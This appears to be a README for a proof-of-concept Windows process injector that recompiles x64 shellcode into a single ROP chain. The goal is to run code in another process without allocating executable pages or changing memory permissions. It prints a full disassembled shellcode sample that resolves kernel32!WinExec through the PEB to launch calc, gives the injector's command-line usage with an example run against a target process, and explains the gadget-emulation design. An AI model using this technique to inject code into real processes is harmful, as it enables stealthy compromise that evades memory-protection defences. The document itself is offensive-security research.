Injecting code into a process without allocating a single executable page by recompiling x64 shellcode into a single ROP chain.
In this example we recompile this shellcode which uses the PEB to iterate loaded modules, finds kernel32.dll!WinExec, and uses it to open the windows calculator.
Shellcode Example
0: fc cld
1: 48 31 d2 xor rdx,rdx
4: 65 48 8b 52 60 mov rdx,QWORD PTR gs:[rdx+0x60]
9: 48 8b 52 18 mov rdx,QWORD PTR [rdx+0x18]
d: 48 8b 52 20 mov rdx,QWORD PTR [rdx+0x20]
11: 48 8b 12 mov rdx,QWORD PTR [rdx]
14: 48 8b 12 mov rdx,QWORD PTR [rdx]
17: 48 8b 5a 20 mov rbx,QWORD PTR [rdx+0x20]
1b: 8b 43 3c mov eax,DWORD PTR [rbx+0x3c]
1e: 48 01 d8 add rax,rbx
21: 8b 80 88 00 00 00 mov eax,DWORD PTR [rax+0x88]
27: 85 c0 test eax,eax
29: 74 61 je 0x8c
2b: 48 01 d8 add rax,rbx
2e: 8b 48 18 mov ecx,DWORD PTR [rax+0x18]
31: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
35: 49 01 d8 add r8,rbx
38: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]
3c: 49 01 d9 add r9,rbx
3f: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]
43: 49 01 da add r10,rbx
46: ff c9 dec ecx
48: 78 42 js 0x8c
4a: 41 8b 34 88 mov esi,DWORD PTR [r8+rcx*4]
4e: 48 01 de add rsi,rbx
51: 81 3e 57 69 6e 45 cmp DWORD PTR [rsi],0x456e6957
57: 75 ed jne 0x46
59: 81 7e 04 78 65 63 00 cmp DWORD PTR [rsi+0x4],0x636578
60: 75 e4 jne 0x46
62: 41 0f b7 04 49 movzx eax,WORD PTR [r9+rcx*2]
67: 41 8b 04 82 mov eax,DWORD PTR [r10+rax*4]
6b: 48 01 d8 add rax,rbx
6e: 48 83 ec 28 sub rsp,0x28
72: c7 04 24 63 61 6c 63 mov DWORD PTR [rsp],0x636c6163
79: c6 44 24 04 00 mov BYTE PTR [rsp+0x4],0x0
7e: 48 89 e1 mov rcx,rsp
81: ba 01 00 00 00 mov edx,0x1
86: ff d0 call rax
88: 48 83 c4 28 add rsp,0x28
8c: cc int3ROPpenheimer Injector
.\rophi [OPTIONS]
OPTIONS:
-h, --help Print this help message and exit
-f, --file TEXT:FILE REQUIRED
Input file.
-p, --process TEXT REQUIRED
Process name.
-d, --dump Dump the LLVM IR to the screen.
--stack-block-size UINT
Size of allocated region for the ROP chain.
--register-block-size UINT
Size of allocated region for the virtual registers.$ .\rophi -f payload.bin -p test.exeWell, to understand how it works, we need to understand the motivation:
How can we execute arbitrary code (in usermode) in another process without:
- Allocating a new executable page
- Changing memory permissions (e.g. making pages writable + executable)
Well, the first thing that came to my mind was ROP, reusing code that already exists in the process to execute what we want. And that's good enough for us. But a big issue that we have is that we only have so many gadgets, so it's not feasible to directly translate each shellcode instruction into a 1:1 corresponding gadget, and even if we could we would have to emit an equivalent gadget for hundreds or thousands of instructions.
That's exactly where Remill comes into play, it allows us to lift normal x64 shellcode into LLVM IR where we only have to implement like ~70 "instructions" at most. Okay so we only have a fraction of the previously thousands of instructions that we need to find a corresponding gadget for, but still, it's far too much. So to solve this what we do is we only gather about ~14 gadgets and we use these to build an abstraction layer to emulate other instructions. If you've played turing complete or've done nand2tetris, you'll see where I'm going with this.
For example we don't have a subtraction gadget, instead, we emit the gadgets necessary to emulate the effect of the subtraction instruction with addition and a not: a + (~b + 1),
so on and so forth. Generally we build this on top of VRegisters, which are just slots of memory that allow us to consistently model the state of registers across different gadgets that may alter the actual register, and also provides the ability to read/write to any "register" even though we generally only use
rax, and rcx for gadget instructions. So yeah that's pretty much the gist.
This is still absolutely a PoC, with innumerable bugs, missing instruction implementations, and more, most of which I’ll either fix later or address in another version. Feel free to report an issue or open a pr.
